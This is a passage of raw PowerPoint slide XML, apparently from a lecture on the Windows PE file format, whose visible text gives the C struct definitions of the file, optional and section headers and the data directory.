                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> IMAGE_FILE_HEADER</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000080"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000080"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>*</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>PIMAGE_FILE_HEADER</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000080"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>;</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                        <a:effectLst/>
                        <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Calibri"/>
                        <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="tx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05848719"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="762000" y="3733800"/>
          <a:ext cx="7696200" cy="2772918"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3848100"/>
                <a:gridCol w="3848100"/>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>typedef</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="8000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>struct</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> _IMAGE_OPTIONAL_HEADER </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WORD    Magic</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BYTE    </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>MajorLinkerVersion</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BYTE    </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>MinorLinkerVersion</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SizeOfCode</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SizeOfInitializedData</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SizeOfUninitializedData</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AddressOfEntryPoint</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BaseOfCode</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BaseOfData</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baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>    </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>DWORD   </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ImageBase</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SectionAlignment</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FileAlignment</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WORD    </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>MajorOperatingSystemVersion</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WORD    </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>MinorOperatingSystemVersion</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WORD    </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>MajorImageVersion</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WORD    </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>MinorImageVersion</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txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:highlight>
                          <a:srgbClr val="FFFFFF"/>
                        </a:highligh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WORD    </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>MajorSubsystemVersion</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WORD    </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>MinorSubsystemVersion</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Win32VersionValue</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SizeOfImage</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SizeOfHeaders</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CheckSum</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WORD    Subsystem</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WORD    </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>DllCharacteristics</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SizeOfStackReserve</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SizeOfStackCommit</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SizeOfHeapReserve</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SizeOfHeapCommit</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LoaderFlags</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DWORD   </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>NumberOfRvaAndSizes</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000080"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>;</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="9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US" sz="900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>    IMAGE_DATA_DIRECTORY </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>DataDirectory</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000080"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>16</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000080"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>];</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000080"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>}</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">
                        <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3279463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420469"/>
            <a:ext cx="32766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Data Directory</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              <a:ea typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              <a:cs typeface="Arial Unicode MS" pitchFamily="34" charset="-12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565374"/>
            <a:ext cx="4648200" cy="4911626"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3831032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457200"/>
            <a:ext cx="42672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Image section table</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              <a:ea typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              <a:cs typeface="Arial Unicode MS"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2129809731"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="1600200"/>
          <a:ext cx="3733800" cy="3048000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3733800"/>
              </a:tblGrid>
              <a:tr h="3048000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="804000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>#define IMAGE_SIZEOF_SHORT_NAME              8</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b="1" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>typedef</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="8000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>struct</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> _IMAGE_SECTION_HEADER </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BYTE    Name</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000080"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>IMAGE_SIZEOF_SHORT_NAME</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="8000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>union</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </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DWORD   </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>PhysicalAddress</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DWORD   </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>VirtualSize</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000080"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>}</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Misc</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DWORD   </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>VirtualAddress</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DWORD   </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>SizeOfRawData</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DWORD   </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>PointerToRawData</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DWORD   </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>PointerToRelocations</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DWORD   </a:t>
                      </a:r>
                      <a:r>
